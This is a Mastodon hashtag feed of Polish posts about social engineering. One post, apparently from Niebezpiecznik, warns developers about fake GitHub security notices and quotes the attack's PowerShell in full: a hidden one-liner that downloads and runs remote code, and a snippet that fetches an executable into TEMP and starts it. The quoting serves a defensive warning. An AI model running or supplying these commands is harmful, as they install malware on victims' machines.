fosstodon.org is one of the many independent Mastodon servers you can use to participate in the fediverse.
Fosstodon is an invite only Mastodon instance that is open to those who are interested in technology; particularly free & open source software. If you wish to join, contact us for an invite.

Administered by:

Server stats:

10K
active users

#socjotechnika

0 posts0 participants0 posts today
sekurak News<p>Historia o tym jak twórca HaveIBeenPwned trafił do własnej bazy weryfikacji wycieków ;-)</p><p>Nie ma co ukrywać, że nabranie się na phishing nie dotyczy tylko przeciętnych niezwiązanych z cyberbezpieczeństwem Kowalskich, ale także ludzi zawodowo związanych z bezpieczeństwem IT. Nigdy nie jesteś wystarczająco czujny, aby odsiać każdą podejrzaną wiadomość.&nbsp; Możecie spytać Troya Hunta – stanowczo potwierdzi! ;) Jeśli nie słyszeliście dotąd o dzisiejszym bohaterze...</p><p><a href="https://mastodon.com.pl/tags/WBiegu" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>WBiegu</span></a> <a href="https://mastodon.com.pl/tags/HIBP" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>HIBP</span></a> <a href="https://mastodon.com.pl/tags/Phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Phishing</span></a> <a href="https://mastodon.com.pl/tags/Socjotechnika" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Socjotechnika</span></a> <a href="https://mastodon.com.pl/tags/Troyhunt" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Troyhunt</span></a> <a href="https://mastodon.com.pl/tags/Wyciek" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Wyciek</span></a></p><p><a href="https://sekurak.pl/historia-o-tym-jak-tworca-haveibeenpwned-trafil-do-wlasnej-bazy-weryfikacji-wyciekow/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">sekurak.pl/historia-o-tym-jak-</span><span class="invisible">tworca-haveibeenpwned-trafil-do-wlasnej-bazy-weryfikacji-wyciekow/</span></a></p>
Niebezpiecznik News<p>Uwaga programiści! Ktoś wysyła cwane komunikaty przez GitHuba</p><p>Jak informują nas programiści posiadający konto na GitHubie, od wczoraj otrzymują&nbsp;powiadomienia o następującej treści:<br>fot. przesłana prze z Jana<br>Hey there!<br>We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue.<br>Best regards,<br>Github Security Team<br>Powiadomienia są triggerowane przez dodanie (a następnie usunięcie) tzw. “issue” do projektu. Gdzie prowadzi link? Ano do strony, która próbuje na programiście wykonać atak “na CAPTCHA” opisywany przez nas ponad 2 tygodnie temu w ramach CyberAlertu. Ofiara widzi to:</p><p>Kliknięcie w przycisk na pierwszym ekranie kopiuje do schowka ofiary następującą&nbsp;komendę:<br>powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: XXXXXX"<br>A zastosowanie się&nbsp;do instrukcji widocznej na kolejnym ekranie uruchamia powyższą komendę, czyli w konsekwencji następujący kod infekujący komputer ofiary złośliwym oprogramowaniem: <br>$webClient = New-Object System.Net.WebClient<br>$url1 = "https://github-scanner[.]com/l6E.exe"<br>$filePath1 = "$env:TEMP\SysSetup.exe"<br>$webClient.DownloadFile($url1, $filePath1)<br>Start-Process -FilePath $env:TEMP\SysSetup.exe<br>Szczerze mówiąc, trochę nas dziwi dobór ofiar. Programiści akurat są świadomi, co robi skrót WIN+R. Z drugiej jednak strony, zainfekować programistę popularnego projektu na GitHubie to jak wygrać w totka…<br>Na jakie jeszcze ataki powinni uważać programiści?<br>Jeśli chcesz poznać wszystkie ataki, na które powinni być wyczuleni programiści aplikacji webowych, to wpadnij na nasze szkolenie z “Atakowanie i Ochrony Webaplikacji”. To dwa dni pełne praktyki [...]</p><p><a href="https://mastodon.com.pl/tags/Ataki" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Ataki</span></a> <a href="https://mastodon.com.pl/tags/Captcha" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Captcha</span></a> <a href="https://mastodon.com.pl/tags/GitHub" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>GitHub</span></a> <a href="https://mastodon.com.pl/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://mastodon.com.pl/tags/Phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Phishing</span></a> <a href="https://mastodon.com.pl/tags/Programista" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Programista</span></a> <a href="https://mastodon.com.pl/tags/Programowanie" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Programowanie</span></a> <a href="https://mastodon.com.pl/tags/Socjotechnika" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Socjotechnika</span></a></p><p><a href="https://niebezpiecznik.pl/post/uwaga-programisci-ktos-wysyla-cwane-komunikaty-przez-githuba/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">niebezpiecznik.pl/post/uwaga-p</span><span class="invisible">rogramisci-ktos-wysyla-cwane-komunikaty-przez-githuba/</span></a></p>
prywatnie.eu<p>Czy wiesz, jak przestępcy wykorzystują Twoją psychologię w cyberatakach?</p><p>Odkryj sekrety socjotechniki i zabezpiecz swoje dane! 🛡️💻 <a href="https://mastodon.social/tags/Socjotechnika" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Socjotechnika</span></a> <a href="https://mastodon.social/tags/Cyberbezpiecze%C5%84stwo" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Cyberbezpieczeństwo</span></a></p><p><a href="https://prywatnie.eu/socjotechnika/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="">prywatnie.eu/socjotechnika/</span><span class="invisible"></span></a></p>
Rafał Wileczek<p>Kevin Mitnick był w swoim czasie najlepszy, ale to socjotechnika była jego kluczowym narzędziem pracy. O ile – prawdopodobnie – nie był twórcą, to na pewno popularyzatorem stwierdzenia, że najlepszym sposobem pozyskania czyichś wrażliwych danych jest zapytanie o nie wprost. <br>Niewątpliwie skończyła się pewna epoka (jakkolwiek banalnie by to nie zabrzmiało).</p><p><a href="https://www.komputerswiat.pl/artykuly/redakcyjne/fbi-polowalo-na-niego-latami-nie-zyje-najslynniejszy-haker-w-historii/txvjx7m" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">komputerswiat.pl/artykuly/reda</span><span class="invisible">kcyjne/fbi-polowalo-na-niego-latami-nie-zyje-najslynniejszy-haker-w-historii/txvjx7m</span></a></p><p><a href="https://pol.social/tags/KevinMitnick" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>KevinMitnick</span></a> <a href="https://pol.social/tags/kevinmitnick" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>kevinmitnick</span></a> <a href="https://pol.social/tags/hacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>hacking</span></a> <a href="https://pol.social/tags/socjotechnika" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>socjotechnika</span></a></p>
Kuba Orlik<p>(Recepcja w wiezowcu)<br>- dzien dobry, ja do firmy XYZ<br>- jest pan na liscie?<br>- powinienem być<br>- nazwisko?<br>- Orlik<br>- nie ma pana na liście<br>- ale powinienem być<br>- aaa, to prosze wejsc (otwiera bramke)</p><p><a href="https://mastodon.host/tags/socjotechnika" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>socjotechnika</span></a></p>